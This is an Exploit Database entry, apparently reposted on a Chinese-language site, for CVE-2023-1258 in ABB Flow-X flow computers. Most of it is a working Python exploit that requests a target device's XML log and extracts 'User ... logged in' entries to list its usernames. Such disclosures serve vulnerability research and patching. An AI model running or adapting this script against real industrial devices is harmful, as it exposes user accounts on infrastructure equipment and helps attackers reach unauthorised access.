ABB FlowX v4.00 – Exposure of Sensitive Information

• Exploit Database
• 16 阅读

• 作者： Paul Smith
  日期： 2023-07-19
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51603/

• # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
  # Date: 2023-03-31
  # Exploit Author: Paul Smith
  # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
  # Version: ABB Flow-X all versions before V4.00
  # Tested on: Kali Linux
  # CVE: CVE-2023-1258
  
  
  #!/usr/bin/python
  import sys
  import re
  from bs4 import BeautifulSoup as BS
  import lxml
  import requests
  
  # Set the request parameter
  url = sys.argv[1]
  
  
  def dump_users():
  response = requests.get(url)
  
  # Check for HTTP codes other than 200
  if response.status_code != 200:
  	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
  	exit()
  
  # Decode the xml response into dictionary and use the data
  data = response.text
  soup = BS(data, features="xml")
  logs = soup.find_all("log")
  for log in logs:
  	test = re.search('User (.*?) logged in',str(log))
  	if test:
  		print(test.group(0))
  def main():
  	dump_users()
  
  
  if __name__ == '__main__':
  	main()